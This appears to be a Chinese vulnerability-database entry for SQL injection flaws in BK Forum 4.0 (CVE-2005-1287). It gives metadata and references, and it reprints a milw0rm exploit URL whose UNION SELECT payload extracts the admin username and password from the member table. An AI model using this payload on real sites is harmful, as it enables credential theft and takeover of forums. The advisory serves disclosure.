Black Knight Forum多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110132 漏洞类型 SQL注入
发布时间 2006-04-24 更新时间 2006-04-24
CVE编号 CVE-2005-1287 CNNVD-ID CNNVD-200504-087
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1714
https://www.securityfocus.com/bid/82360
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-087
|漏洞详情
BKforum是由BlackKnight提供的基于ASP的论坛软件。BKForum4.0存在多个SQL注入漏洞,远程攻击者可以通过传到member.asp的(1)id参数,传到forum.asp的(2)forum参数,或在register.asp中的(3)各种参数,来执行任意SQL命令。
|漏洞EXP
# BK Forum <= 4.0 Remote SQL Injection
# by n0m3rcy
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
# Exploit:

First you must be logged in
Then type this in your browser

http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1

You will find admin's password

# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00

# Have phun!

# milw0rm.com [2006-04-24]
|受影响的产品
Bk Dev Bk Forum 4
|参考资料

来源:MISC
链接:http://www.digitalparadox.org/advisories/bkdev.txt
来源:SECTRACK
名称:1013793
链接:http://securitytracker.com/id?1013793
来源:SECUNIA
名称:15072
链接:http://secunia.com/advisories/15072
来源:BUGTRAQ
名称:20060423BKForum<=4.0RemoteSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/431863/100/0/threaded
来源:BUGTRAQ
名称:20060421BKForum<<--V.4.0SQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/431659/100/0/threaded
来源:OSVDB
名称:15786
链接:http://www.osvdb.org/15786
来源:OSVDB
名称:15785
链接:http://www.osvdb.org/15785
来源:OSVDB
名称:15784
链接:http://www.osvdb.org/15784
来源:BUGTRAQ
名称:20050423MultipleSqlinjectionvulnerabilitiesinBKForumv.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111428133317901&w=2